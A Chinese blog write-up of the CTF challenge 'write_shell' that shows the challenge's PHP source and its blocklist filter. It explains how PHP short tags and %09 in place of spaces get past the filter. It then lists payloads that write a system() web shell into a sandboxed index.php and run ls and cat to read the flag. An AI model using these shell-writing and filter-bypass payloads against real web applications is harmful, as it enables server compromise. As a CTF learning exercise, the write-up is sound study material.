练[红明谷CTF 2021]write_shell

最新推荐文章于 2024-05-16 19:21:42 发布
最新推荐文章于 2024-05-16 19:21:42 发布
阅读量221 收藏 1
点赞数 4
分类专栏: buuctf刷题 文章标签: web安全 笔记 php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66225311/article/details/133497301
版权

[红明谷CTF 2021]write_shell

文章目录


在这里插入图片描述

掌握知识

​ 代码审计,短标签的使用,命令执行一些bypass操作,替换空格,只有一行php代码最后可以不需要分号

解题思路

  1. 打开题目链接,就看见一屏幕的代码,很明显是代码审计的题目,通过对代码的简单分析,我们可以经过传参将php代码写入到index.php里,在写入代码之前会对php代码进行过滤,上传的目录文件是根据请求头自动生成的。下面就是代码
<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>
代码分析
  1. 接下来进行详细分析,传递的action的参数值为pwd即输出index.php所在的目录,传递upload,会将传入的data的参数值写入到index.php文件,但在此之前需要进入waf函数进行判断
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
  1. waf函数主要是判断传入的参数值是否是数组,若是数组会将参数分开分别进入到check函数进行参数过滤
function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}
  1. 到了关键的check函数,该函数就是对传入参数进行过滤的函数,很显然过滤了很多比较关键的字符
对于空格替换的字符还是很多的,可以使用%09 %20进行替换,也可以使用一些特殊符号和变量
对于过滤_,意味着不能使用一句话木马的格式了
过滤php字符串,可以使用短标签来进行绕过
过滤;,根据php代码特性,如果只有一行代码,在最后也可以不需要分号
过滤eval函数,还可以使用其他函数,比如直接system()函数进行命令执行

function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}
开始解题
  1. 有了上面的分析过程,paylaod也有了雏形,使用短标签的形式利用system函数进行命令执行/?action=upload&data=<?=system("ls")?>查看当前目录的文件。再传入action=pwd查看上传的目录,访问目录下的index.php查看到命令的回显结果

image-20230930174540105

image-20230930174631134

image-20230930174637062

image-20230930174643585

  1. 再构建paylaod尝试查看根目录下的文件,由于被过滤了空格,可以使用%09进行绕过,再次查看index.php文件发现flag文件

image-20230930174729538

image-20230930174807323

  1. 再次修改system的命令参数,使用cat查看flag文件,再访问index.php,拿下flag

image-20230930174922549

image-20230930174925525

关键paylaod

/?action=pwd

/?action=upload&data=<?=system("ls")?>

/?action=upload&data=<?=system("ls%09/")?>

/?action=upload&data=<?=system("cat%/flllllll1112222222lag")?>
生而逢时
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[红明谷CTF 2021]write_shell
pakho_C的博客
09-11 249
题目提示写shell,结合代码分析,action参数输入pwd可以获取沙盒路径,输入upload并添加data参数,可以把经过waf函数过滤后的命令执行代码或者shell写入index.php中。过滤单引号,可以使用反引号绕过,在php中,被反引号包裹的代码会被当做命令执行。需要完成的就是绕过waf函数的检测,waf函数使用了递归,过滤了’ 空格 _ php;过滤php目的是过滤php标签
[红明谷CTF 2021]write_shell 1
m0_62879498的博客
05-28 913
进入环境,首先进行代码审计 代码审计 <?php error_reporting(0); highlight_file(__FILE__); function check($input){ if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){ // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); }else{ .
[红明谷CTF 2021]write_shell1
wwwyyyxxxx的博客
03-04 345
换行绕过也不行,check函数虽然看着过滤的不多,但是一些关键的被过滤了,让写入空的php文件但是又把分号过滤了,这里在本地试了一下,发现短标签不需要分号,但是这样在本地会莫名其妙的输出1,有没有大佬解释一下。但是想传system("ls /")的时候又有个问题是空格被过滤了,这里要用到一个函数是hen2bin()将十六进制转换为二进制编码后的字符串,ls / 十六进制编码是6C73202F。这里check函数是嵌套在waf里面的,waf嵌套做了一个数组的判断,而check才是真正的waf。
BUUCTF--[红明谷CTF 2021]write_shell
qq_46263951的博客
07-21 1061
补充知识点: PHP中??的作用 $a??$b; $a是不是null,如果不为null,则返回$a,否则返回$b; PHP中的短标签 先来看第一部分代码, 当action=pwd时则给出路径;当action=upload时,可以上传参数data $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/'; if(!file_exists($dir)){ mkdir($dir); } switch($_GET["action"] ?
网络安全】一次sql注入问题的处理
dualvencsdn的博客
05-10 379
(1)在进行问题解决之前,我们发现 ,即使我们已经在后能进行了打印,确保了不会有sql注入问题。如下。但在当时 ,依然 会有被 -dbs扫描而出的数据库思考:经过程序的打印,已经没有了不正确的sql注入;但依然可以dbs扫描打印出数据库信息 ,有可能是缓存的信息,前面扫描出来的数据库信息!(2)将sqlmap的缓存文件,如下,其中session.sqlite进行取出,用chat2db打开。发现其中的缓存 信息。如下列各图。
网络安全之OSPF进阶详解
m0_65858385的博客
05-13 894
功能:本路由器针对某个区域产生的路由信息和拓扑信息(因为OSPF是一个状态型路由协议),比如该拓扑中R1的所有都在area 1中,所以R1针对area 1中只产生一条LSA而这条LSA包含了R1在该区域的路由信息和拓扑信息,R2针对area 1区域产生一条LSA,在area 0中也产生一条一类LSA,但这两条一类LSA不一样,area1中是R2在area1中的路由信息与拓扑信息,area0中是R2在area0中的路由信息与拓扑信息,所以在area1中有两条一类LSA。发送的是BDB报文进行主从选举。
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 518
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 346
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 2091
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
《2024网络安全报告》中文版
2301_76786857的博客
05-10 488
Check Point发布了《2024 年网络安全报告》,Check Point Research 对网络攻击数据(包括所有地区和全球的统计数据)进行了全面分析,揭示了不断变化的网络威胁形势。● 勒索软件攻击形势严重恶化,传统勒索软件和更难应对的大规模勒索软件攻击均大幅增长。● 去年,全球 1/10 的机构遭遇勒索软件攻击尝试,比上一年激增 33%● 零售/批发相关企业每周所遇攻击次数骤增。
等保测评:构建网络安全的坚实防线
weixin_64392888的博客
05-13 511
等保测评作为网络安全管理的关键环节,对于提高信息系统的安全性能、保障信息安全、促进信息化建设的健康发展具有不可替代的作用。这些法律法规确立了等保测评的法律地位,明确了网络运营者的安全保护义务,并对关键信息基础设施的保护提出了明确要求。等保测评是指依据国家相关法律法规和标准,对信息系统的安全保护状况进行系统的评估和测试。同时,等保测评有助于规范组织的信息安全管理制度,加强对安全政策和流程的执行,确保网络安全合规运营。2. **安全风险评估**:全面评估信息系统的安全风险,识别潜在的安全威胁。
信安标委发布16项网络安全国家标准:8项为旧标准替代,8项标准为新发布
网络安全
05-10 1185
当前公开发布的标准,在全国标准信息服务平台还尚未收录,暂无公开获取渠道。后续博主会持续跟进,在文章中附上对应的标准文档下载链接。根据2024年4月25日国家市场监督管理总局、国家标准化管理委员会发布的。全国网络安全标准化技术委员会归口的16项国家标准正式发布。
【2024高校网络安全管理运维赛】巨细记录!
jayq1的博客
05-08 2067
虽然不是全部题目,但对于做出来的题目记录非常详细,题目还是挺有意思的,希望对师傅们有帮助,欢迎师傅们来交流指导!
等保2.0的全面解读与实施策略
2403_84237550的博客
05-14 437
网络安全等级保护基本要求》(等保2.0)是中华人民共和国国家安全部于2019年6月发布的网络安全等级保护标准。该标准规定了我国关键信息基础设施的网络安全等级保护要求和评估标准,对于保障我国网络安全具有重要的意义。其次,等保2.0的实施有助于保护国家和企业的信息安全,维护社会稳定和经济发展。随着信息技术的快速发展,网络攻击、数据泄露等网络安全问题日益严重,给国家和企业的信息安全带来了巨大的威胁。为保障我国关键信息基础设施的安全,国家制定了等保2.0,以加强对网络安全的保护和管理。三、等保2.0的实施策略。
网络安全】【Frida实战案例】某图xx付费功能逆向分析(二)
IT痴者
05-15 221
整体hook过程比较顺畅。配合objection使用,快速定位需要的方法。
网络安全(黑客)自学启蒙
白帽子佳奇的博客
05-08 1554
当我们谈论网络安全时,我们正在讨论的是保护我们的在线空间,这是我们所有人的共享责任。网络安全涉及保护我们的信息,防止被未经授权的人访问、披露、破坏或修改。
网络安全实训Day24(End)
HUANGXIN9898的博客
05-13 325
php://filter/read=convert.base64-encode/resource=文件路径。base64,Base64编码后的PHP代码。php://filter/resource=文件路径。Base64加密后的+和=需要进行URL编码。2.在注册表中,将管理员的F值复制给后门账户。肉鸡主动连接控制端,无需担心肉鸡IP地址变更。3.在注册表中,将后门账户的注册表项导出。在URL中构造PHP代码在网站中执行。1.开启目标主机的远程控制服务。Windows系统日志。4.手动删除后门账户。
网络安全产品互联互通 告警信息&资产信息】相关思维导图
MingXS2021的博客
05-11 236
近日,在某客户安全建设项目中,涉及安全告警事件的梳理上报。在整理及学习中发现最近(以19年等保2.0为参考分隔“最近”)发布的可参考标准,因此做了思维导图的整理。PS:标准中存在引用的情况,过滤并梳理了一部分标准;一般以国标为主,全国信安标委标准也是引用的国标;梳理维度为告警&资产,常关注的内容,部分标准的内容暂时未梳理进本文;
Linux知识点笔记
最新发布
exercise_smile的博客
05-16 554
Linux 主要的发行版(release):Ubuntu(乌班图)、 RedHat(红帽)、 CentOS、 Debain[蝶变]、 Fedora、 SuSE、 OpenSUSE [示意图]在 linux 中的每个用户必须属于一个组, 不能独立于组外。在 linux 中每个文件 有所有者、 所在组、 其它组的概念。ls -l 中显示的内容如下:0-9 位说明:第 0 位确定文件类型(d, - , l , c , b)l 是链接, 相当于 windows 的快捷方式。
XTuner笔记
qq_19859865的博客
05-10 395
方法:在模型的每一层之间添加可训的小规模的网络,冻结原始网络权重,以此来减少fine-tune所需要的参数量。应用:适用于那些希望在保持预训模型结构不变的同时,对模型进行特定任务调整的场景。缺点:引入推理延时在LoRA的基础上,添加了NF4的数据压缩(信息理论中最有的正太分布数据量化数据类型),进一步减少了显存和内存的消耗;然后添加一组可学习的LoRA权重,这些权重通过量化权重的反向传播梯度进行调整。块状 k-bit 量化:既压缩了数据,又解决了异常值(我理解为噪声)对数据压缩的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值